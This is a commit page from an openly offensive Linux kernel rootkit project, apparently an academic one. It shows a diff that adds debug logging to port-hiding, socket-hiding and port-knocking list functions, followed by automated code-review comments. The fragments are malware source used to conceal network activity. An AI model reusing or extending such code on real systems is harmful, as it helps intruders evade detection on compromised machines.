linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit

commit 3743692d5eb1139baeae0dbebf0bfecf10b3dba8
parent 14d6efa8eca2edc073cbef338248f335e8061f42
Author: deurzen <m.deurzen@tum.de>
Date:   Sun, 10 Jan 2021 21:38:21 +0100

adds debug info

Diffstat:
Msrc/porthide.c | 13++++++++++---
Msrc/sockhide.c | 1+
2 files changed, 11 insertions(+), 3 deletions(-)

diff --git a/src/porthide.c b/src/porthide.c
@@ -91,16 +91,22 @@ clear_hidden_lports(void)
 ip_t no_ip = { 0 };
 i = ips_stage1_tail;
- if (memcmp(i->ip, no_ip, (i->version == v4 ? 4 : 16)))
+ if (memcmp(i->ip, no_ip, (i->version == v4 ? 4 : 16))) {
+ DEBUG_INFO("removing from stage1\n");
 while ((i = remove_knock_from_list(i, &i, i->ip, i->version)));
+ }
 i = ips_stage2_tail;
- if (memcmp(i->ip, no_ip, (i->version == v4 ? 4 : 16)))
+ if (memcmp(i->ip, no_ip, (i->version == v4 ? 4 : 16))) {
+ DEBUG_INFO("removing from stage2\n");
 while ((i = remove_knock_from_list(i, &i, i->ip, i->version)));
+ }
 i = ips_stage3_tail;
- if (memcmp(i->ip, no_ip, (i->version == v4 ? 4 : 16)))
+ if (memcmp(i->ip, no_ip, (i->version == v4 ? 4 : 16))) {
+ DEBUG_INFO("removing from stage3\n");
 while ((i = remove_knock_from_list(i, &i, i->ip, i->version)));
+ }
 lport_list_t_ptr j;
@@ -151,6 +157,7 @@ remove_lport_from_list(lport_list_t_ptr list, lport_t lport)
 lport_list_t_ptr i = find_lport_in_list(list, lport), ret = NULL;
 if (i && (i->lport != -1)) {
+ DEBUG_INFO("remove_lport_from_list: removing lport %d\n", lport);
 if (i->next)
 i->next->prev = i->prev;
 else
diff --git a/src/sockhide.c b/src/sockhide.c
@@ -168,6 +168,7 @@ remove_port_from_list(port_list_t_ptr list, port_t port, proto_t proto)
 port_list_t_ptr i = find_port_in_list(list, port, proto), ret = NULL;
 if (i && (i->port != -1 && i->proto != -1)) {
+ DEBUG_INFO("remove_port_from_list: removing port %d\n", port);
 if (i->next)
 i->next->prev = i->prev;
 else
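Review bot: The three messages added in clear_hidden_lports (`"removing from stage1\n"` and its stage2/stage3 siblings) carry no function prefix, while the two other messages this commit adds start with `remove_lport_from_list:` and `remove_port_from_list:`, so the stage lines cannot be attributed to this function when reading the log. Matching the convention would be `DEBUG_INFO("clear_hidden_lports: removing from stage1\n");` and likewise for the other two. DEBUG_INFO is defined outside this diff; if it writes to the kernel log, then for an analyst examining a host these fixed strings are a direct indicator that a debug build of this module was loaded. The function body begins before and continues past the hunk.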
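Review bot: In remove_lport_from_list the added DEBUG_INFO call passes `lport`, an `lport_t`, to `%d`, and the typedef is not visible in this diff; if it is not an int-compatible type, the specifier and the argument disagree. Either cast at the call, `DEBUG_INFO("remove_lport_from_list: removing lport %d\n", (int)lport);`, or use the specifier that matches the typedef. The same applies to `port` (`port_t`) in the remove_port_from_list hunk of src/sockhide.c. The comparison `i->lport != -1` suggests a signed type, but that is inferred. The function continues past the end of the hunk.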
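Review bot: The message added in remove_port_from_list names only the port, although the entry is looked up by port and protocol through `find_port_in_list(list, port, proto)`, so two entries with the same port and different protocols produce identical log lines. Including the protocol removes the ambiguity, e.g. `DEBUG_INFO("remove_port_from_list: removing port %d proto %d\n", (int)port, (int)proto);`. The casts assume both typedefs fit in an int, which this diff does not show. The function continues outside the hunk.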